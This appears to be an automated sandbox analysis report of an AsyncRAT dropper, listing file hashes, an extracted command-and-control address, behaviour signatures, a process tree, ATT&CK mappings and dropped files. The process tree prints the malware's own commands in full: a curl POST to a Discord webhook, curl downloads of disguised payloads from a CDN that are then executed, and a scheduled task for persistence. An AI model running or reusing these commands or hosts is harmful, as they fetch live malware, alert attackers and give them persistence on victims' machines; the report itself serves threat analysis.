Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    22-06-2024 08:39

General

  • Target

    Dropper.exe

  • Size

    88KB

  • MD5

    82f78463f2a3b53111a06367e6f9bfd7

  • SHA1

    ef55bb9f0648e2f0e4444c54db5fdc4ba002ad9f

  • SHA256

    3aed680e7ffde9f2f34681d7d60ee188862da9d48c7cace56060eebd6bbfb152

  • SHA512

    b781362092c869cd0b8fd5f92c8e2ece37e65a8b864e7127d5a8837ab06d1a08decc795bc7a4bfa58f362af5db26d1287f289155d7408a47b9ecf054419583c0

  • SSDEEP

    1536:hi8ujM8Nvd5hPSXvD1n70U4Ox+d9xHhGYL15b6tclMDgR:E84MMxSXpnJ6xfb6tYR

Score
10/10

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

environmental-blank.gl.at.ply.gg:25944

Attributes
  • delay

    1

  • install

    true

  • install_file

    $77-aachost.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT, written in C#, is designed to remotely monitor and control other computers.

  • Async RAT payload 1 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Dropper.exe
    "C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2080
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4848
      • C:\Windows\SysWOW64\curl.exe
        curl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
        3⤵
        PID:4792
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4564
      • C:\Windows\SysWOW64\curl.exe
        curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
        3⤵
        PID:1188
    • C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
      "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4184
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:544
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2548
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp815B.tmp.bat""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3248
        • C:\Windows\system32\timeout.exe
          timeout 3
          4⤵
          • Delays execution with timeout.exe
          PID:2436
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4912
      • C:\Windows\SysWOW64\curl.exe
        curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
        3⤵
        PID:4276
    • C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
      "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4404
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware2.mp4?v=1719043121460 --output C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4068
      • C:\Windows\SysWOW64\curl.exe
        curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware2.mp4?v=1719043121460 --output C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
        3⤵
        PID:1864
    • C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
      "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:4980
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-install.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5032
      • C:\Windows\SysWOW64\curl.exe
        curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-install.exe
        3⤵
        PID:1868
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:4556

MITRE ATT&CK Matrix ATT&CK v13

  • Execution
    Scheduled Task/Job (1) T1053
    Scheduled Task (1) T1053.005
  • Persistence
    Scheduled Task/Job (1) T1053
    Scheduled Task (1) T1053.005
  • Privilege Escalation
    Scheduled Task/Job (1) T1053
    Scheduled Task (1) T1053.005
  • Discovery
    Query Registry (2) T1012
    System Information Discovery (2) T1082
  • Command and Control
    Web Service (1) T1102

Downloads

  • C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
    Filesize 66KB
    MD5 514d0abd73e992c2a1622795b33f17f4
    SHA1 96740e82d7a119d808000783507bd92690584fe6
    SHA256 b333ecc39a213f6ce650dd4af50d2d201ee6f80dea63ec98132220670469bf53
    SHA512 4600baecf44a9cbc7b33fd02d1807628597c6ecc87aeb12b653f6e3a46c951fe9cd789e100d96df8c57b5d0446397c8a639f0c7ee8ef9395c172598ce8185bc8

  • C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
    Filesize 256KB
    MD5 18f497deffe88b6b2cff336a277aface
    SHA1 4e1413241d3d3e4dbff399d179f8fd64f3ecd39e
    SHA256 8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5
    SHA512 35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d

  • C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
    Filesize 299KB
    MD5 12d2d1f43b0ecf5a949adde54b1ffb65
    SHA1 ad0529bc9102210f3616c7b626c37d6454d44033
    SHA256 619b345f6803d45bcf20305efb3407a8ae26ba0aaffe38e7b5f31cb8c26101ef
    SHA512 0a55fc91d0bc7e3123b16b012c70c15f731c3be1f8499c733cc994fcec43d8cdf6279e0b9eedda35035423c8891e076be374c512d6506d81e1f81802af25153f

  • C:\Users\Admin\AppData\Local\Temp\tmp815B.tmp.bat
    Filesize 155B
    MD5 d18965182157fee8347183c7ad862427
    SHA1 f1d53d7eb51b900d8a64a88dce9f97bb69702773
    SHA256 95798dc64ea9d985f441773f68767f03151c8eff61a908a0e709298a9561ac35
    SHA512 7e749a2c20850cd7264f76880b3d34a2c74e4bd85e4a3cc4d290ad1f25e5005960d097e6dc00c9b4eff10192ad052241641f2a191b60226b9deca31f3097525b

  • memory/2080-0-0x000000007480E000-0x000000007480F000-memory.dmp
    Filesize 4KB

  • memory/2080-1-0x0000000000C30000-0x0000000000C4C000-memory.dmp
    Filesize 112KB

  • memory/2080-2-0x000000007480E000-0x000000007480F000-memory.dmp
    Filesize 4KB

  • memory/4184-6-0x00000000000C0000-0x00000000000D6000-memory.dmp
    Filesize 88KB

  • memory/4404-10-0x0000000000B50000-0x0000000000BA2000-memory.dmp
    Filesize 328KB

  • memory/4980-14-0x00000000006C0000-0x0000000000706000-memory.dmp
    Filesize 280KB

  • memory/4980-15-0x0000000002760000-0x0000000002766000-memory.dmp
    Filesize 24KB